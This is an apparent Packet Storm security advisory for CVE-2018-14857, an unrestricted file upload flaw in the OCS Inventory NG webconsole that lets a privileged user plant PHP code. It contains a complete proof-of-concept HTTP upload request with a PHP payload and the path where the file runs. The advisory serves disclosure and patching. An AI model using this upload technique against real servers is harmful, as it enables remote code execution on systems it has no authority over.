OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted.
2f71b923fd12139847ac2ff8144d07a7250e7131bad2b3d7db85ba17ff41bf94# Title
Unrestricted File Upload (RCE) in OCS Inventory NG Webconsole before 2.5
#Reserved CVE
CVE-2018-14857
# Vulnerability Overview
OCS Inventory NG OCS Inventory Server through 2.5 allows a privileged user to gain access to the server via a template file containing PHP code, because file extensions other than .html are permitted.
# Discovered By
Simon Uvarov
# Vendor Status
Fixed.
# Vulnerability Details
The following request saves the phpinfo.php file to the `/usr/share/ocsinventory-reports/ocsreports/templates/` directory.
```
POST /ocsreports/index.php?function=notification HTTP/1.1
Host: 192.168.5.135
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko/20100101 Firefox/61.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.5.135/ocsreports/index.php?function=notification
Content-Type: multipart/form-data; boundary=---------------------------2093529028912
Content-Length: 970
Cookie: VERS=7015; show_all_plugins_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%225%22%3Bi%3A5%3Bs%3A1%3A%228%22%3B%7D; LANG=en_GB; IPDISCOVER_inv_col=a%3A6%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%222%22%3Bi%3A2%3Bs%3A1%3A%223%22%3Bi%3A3%3Bs%3A1%3A%224%22%3Bi%3A4%3Bs%3A1%3A%226%22%3Bi%3A5%3Bs%3A1%3A%227%22%3B%7D; DOWNLOAD_AFFECT_RULES_col=a%3A2%3A%7Bi%3A0%3Bs%3A1%3A%220%22%3Bi%3A1%3Bs%3A1%3A%224%22%3B%7D; PHPSESSID=0ljuolnkjcbh77ie825k3c2dc7
Connection: close
Upgrade-Insecure-Requests: 1
-----------------------------2093529028912
Content-Disposition: form-data; name="CSRF_584"
c282a92b615fcae79a060321a8285c92d759197f
-----------------------------2093529028912
Content-Disposition: form-data; name="onglet"
NOTIF_PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="old_onglet"
NOTIF_PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="notif_choice"
PERSO
-----------------------------2093529028912
Content-Disposition: form-data; name="template"; filename="phpinfo.php"
Content-Type: text/html
<?php phpinfo(); ?>
-----------------------------2093529028912
Content-Disposition: form-data; name="subject"
-----------------------------2093529028912
Content-Disposition: form-data; name="RELOAD_CONF"
-----------------------------2093529028912
Content-Disposition: form-data; name="Send"
Update
-----------------------------2093529028912--
```
The PHP file is then accessible via http://192.168.5.135/ocsreports/templates/phpinfo.php
# Timeline:
2018-08-01: vuln discovered
2018-08-01: emailed vendor
2018-08-02: reply from vendor: vuln confirmed & patch is created
2018-08-03: public disclosure
# Patch:
https://github.com/OCSInventory-NG/OCSInventory-ocsreports/commit/cc572819e373f7ff81dec61591b6f465b43c5515
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed